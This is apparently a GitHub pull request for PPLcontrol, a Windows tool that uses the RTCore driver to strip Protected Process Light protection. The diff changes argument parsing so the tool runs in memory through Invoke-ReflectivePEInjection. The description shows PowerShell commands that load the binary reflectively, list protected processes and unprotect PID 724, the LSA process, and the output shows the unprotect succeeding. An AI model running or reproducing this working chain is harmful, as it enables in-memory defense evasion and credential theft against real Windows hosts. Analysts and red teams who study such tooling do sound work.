### PR TITLE
Update command line parsing in `PPLcontrol.cpp` to make it compatible with  `Invoke-ReflectivePEInjection`

### DIFF
--- a/PPLcontrol/PPLcontrol.cpp
+++ b/PPLcontrol/PPLcontrol.cpp
@@ -1,3 +1,12 @@
+#include "common.h"
+#include "OffsetFinder.h"
+#include "RTCore.h"
+#include "Utils.h"
+#include "Controller.h"
+#include <shellapi.h>
+
+#define PPLCONTROL_STR_CMD_LIST         L"list"
+#define PPLCONTROL_STR_CMD_GET          L"get"
 #define PPLCONTROL_STR_CMD_SET          L"set"
 #define PPLCONTROL_STR_CMD_PROTECT      L"protect"
 #define PPLCONTROL_STR_CMD_UNPROTECT    L"unprotect"

--- a/PPLcontrol/PPLcontrol.cpp
+++ b/PPLcontrol/PPLcontrol.cpp
@@ -1,11 +1,3 @@
-#include "common.h"
-#include "OffsetFinder.h"
-#include "RTCore.h"
-#include "Utils.h"
-#include "Controller.h"
-
-#define PPLCONTROL_STR_CMD_LIST         L"list"
-#define PPLCONTROL_STR_CMD_GET          L"get"
 #define PPLCONTROL_STR_CMD_SET          L"set"
 #define PPLCONTROL_STR_CMD_PROTECT      L"protect"
 #define PPLCONTROL_STR_CMD_UNPROTECT    L"unprotect"
@@ -20,9 +12,19 @@ int wmain(int argc, wchar_t* argv[])
     Controller* ctrl;
     DWORD dwPid;
 
-    if (argc < 2)
+    LPWSTR* szArglist;
+    int nArgs;
+        
+    szArglist = CommandLineToArgvW(GetCommandLineW(), &nArgs);
+    if (NULL == szArglist)
     {
-        PrintUsage(argv[0]);
+        ERROR(L"Failed to parse command line.");
+        return 1;
+    }
+
+    if (nArgs < 2)
+    {
+        PrintUsage(szArglist[0]);
         PrintKernelDriverUsage();
         return 1;
     }
@@ -37,82 +39,85 @@ int wmain(int argc, wchar_t* argv[])
         return 2;
     }
 
-    if (!_wcsicmp(argv[1], PPLCONTROL_STR_CMD_LIST))
+    if (!_wcsicmp(szArglist[1], PPLCONTROL_STR_CMD_LIST))
     {
         if (!ctrl->ListProtectedProcesses())
             return 2;
     }
-    else if (!_wcsicmp(argv[1], PPLCONTROL_STR_CMD_GET) || !_wcsicmp(argv[1], PPLCONTROL_STR_CMD_UNPROTECT))
+    else if (!_wcsicmp(szArglist[1], PPLCONTROL_STR_CMD_GET) || !_wcsicmp(szArglist[1], PPLCONTROL_STR_CMD_UNPROTECT))
     {
-        ++argv;
-        --argc;
+        ++szArglist;
+        --nArgs;
 
-        if (argc < 2)
+        if (nArgs < 2)
         {
-            ERROR(L"Missing argument(s) for command: %ws", argv[0]);
+            ERROR(L"Missing argument(s) for command: %ws", szArglist[0]);
             return 1;
         }
 
-        if (!(dwPid = wcstoul(argv[1], nullptr, 10)))
+        if (!(dwPid = wcstoul(szArglist[1], nullptr, 10)))
         {
-            ERROR(L"Failed to parse argument as an unsigned integer: %ws", argv[1]);
+            ERROR(L"Failed to parse argument as an unsigned integer: %ws", szArglist[1]);
             return 1;
         }
 
-        if (!_wcsicmp(argv[0], PPLCONTROL_STR_CMD_GET))
+        if (!_wcsicmp(szArglist[0], PPLCONTROL_STR_CMD_GET))
         {
             if (!ctrl->GetProcessProtection(dwPid))
                 return 2;
         }
-        else if (!_wcsicmp(argv[0], PPLCONTROL_STR_CMD_UNPROTECT))
+        else if (!_wcsicmp(szArglist[0], PPLCONTROL_STR_CMD_UNPROTECT))
         {
             if (!ctrl->UnprotectProcess(dwPid))
                 return 2;
         }
         else
         {
-            ERROR(L"Unknown command: %ws", argv[0]);
+            ERROR(L"Unknown command: %ws", szArglist[0]);
             return 1;
         }
     }
-    else if (!_wcsicmp(argv[1], PPLCONTROL_STR_CMD_SET) || !_wcsicmp(argv[1], PPLCONTROL_STR_CMD_PROTECT))
+    else if (!_wcsicmp(szArglist[1], PPLCONTROL_STR_CMD_SET) || !_wcsicmp(szArglist[1], PPLCONTROL_STR_CMD_PROTECT))
     {
-        ++argv;
-        --argc;
+        ++szArglist;
+        --nArgs;
 
-        if (argc < 4)
+        if (nArgs < 4)
         {
-            ERROR(L"Missing argument(s) for command: %ws", argv[0]);
+            ERROR(L"Missing argument(s) for command: %ws", szArglist[0]);
             return 1;
         }
 
-        if (!(dwPid = wcstoul(argv[1], nullptr, 10)))
+        if (!(dwPid = wcstoul(szArglist[1], nullptr, 10)))
         {
-            ERROR(L"Failed to parse argument as an unsigned integer: %ws", argv[1]);
+            ERROR(L"Failed to parse argument as an unsigned integer: %ws", szArglist[1]);
             return 1;
         }
 
-        if (!_wcsicmp(argv[0], PPLCONTROL_STR_CMD_SET))
+        if (!_wcsicmp(szArglist[0], PPLCONTROL_STR_CMD_SET))
         {
-            if (!ctrl->SetProcessProtection(dwPid, argv[2], argv[3]))
+            if (!ctrl->SetProcessProtection(dwPid, szArglist[2], szArglist[3]))
                 return 2;
         }
-        else if (!_wcsicmp(argv[0], PPLCONTROL_STR_CMD_PROTECT))
+        else if (!_wcsicmp(szArglist[0], PPLCONTROL_STR_CMD_PROTECT))
         {
-            if (!ctrl->ProtectProcess(dwPid, argv[2], argv[3]))
+            if (!ctrl->ProtectProcess(dwPid, szArglist[2], szArglist[3]))
                 return 2;
         }
         else
         {
-            ERROR(L"Unknown command: %ws", argv[0]);
+            ERROR(L"Unknown command: %ws", szArglist[0]);
             return 1;
         }
     }
     else
     {
-        ERROR(L"Unknown command: %ws", argv[1]);
+        ERROR(L"Unknown command: %ws", szArglist[1]);
         return 1;
     }
+
+    // Free memory allocated for CommandLineToArgvW arguments.
+    LocalFree(szArglist);
 
     DEBUG(L"Done");
 


### PR DESCRIPTION
I made modifications on how command line arguments are handled in order to make the tool compatible with `Invoke-ReflectivePEInjection`. Arguments were not used by the software program when `argc` and `argv` are in use.

I used `shellapi` functions `CommandLineToArgvW()` and `GetCommandLineW()` to parse arguments.
This workaround is mentioned here : <https://twitter.com/ShitSecure/status/1459134838431272960?s=20>

Now it is working fine : 
```Powershell
PS > Import-Module .\Invoke-ReflectivePEInjection.ps1
PS > $pe = [System.IO.File]::ReadAllBytes(".\PPLcontrol.exe")
PS > Invoke-ReflectivePEInjection -PEBytes $pe -ExeArgs "list" -DoNotZeroMZ

   PID  |  Level  |     Signer      |     EXE sig. level    |     DLL sig. level    |    Kernel addr.
 -------+---------+-----------------+-----------------------+-----------------------+--------------------
      4 | PP  (2) | WinSystem   (7) | WindowsTcb     (0x1e) | Windows        (0x1c) | 0xffff9387dc483040
    108 | PP  (2) | WinSystem   (7) | Unchecked      (0x00) | Unchecked      (0x00) | 0xffff9387dc4e5080
    328 | PPL (1) | WinTcb      (6) | WindowsTcb     (0x3e) | Windows        (0x0c) | 0xffff9387dd1b3080
    440 | PPL (1) | WinTcb      (6) | WindowsTcb     (0x3e) | Windows        (0x0c) | 0xffff9387dd021180
    552 | PPL (1) | WinTcb      (6) | WindowsTcb     (0x3e) | Windows        (0x0c) | 0xffff9387ddeb00c0
    560 | PPL (1) | WinTcb      (6) | WindowsTcb     (0x3e) | Windows        (0x0c) | 0xffff9387ddfa0180
    676 | PPL (1) | WinTcb      (6) | WindowsTcb     (0x3e) | Windows        (0x0c) | 0xffff9387de61e080
    724 | PPL (1) | Lsa         (4) | Windows        (0x0c) | Microsoft      (0x08) | 0xffff9387de630080
   1704 | PP  (2) | WinSystem   (7) | Unchecked      (0x00) | Unchecked      (0x00) | 0xffff9387e2113080
   8332 | PPL (1) | Windows     (5) | Windows        (0x3c) | Windows        (0x0c) | 0xffff9387e3b46300
   7956 | PP  (2) | WinTcb      (6) | WindowsTcb     (0x1e) | Windows        (0x1c) | 0xffff9387e35f4080
   8656 | PPL (1) | Windows     (5) | Windows        (0x3c) | Windows        (0x0c) | 0xffff9387e38f1080

[+] Enumerated 12 protected processes.

PS > Invoke-ReflectivePEInjection -PEBytes $pe -ExeArgs "unprotect 724" -DoNotZeroMZ
[+] The process with PID 724 is no longer a PP(L).
```
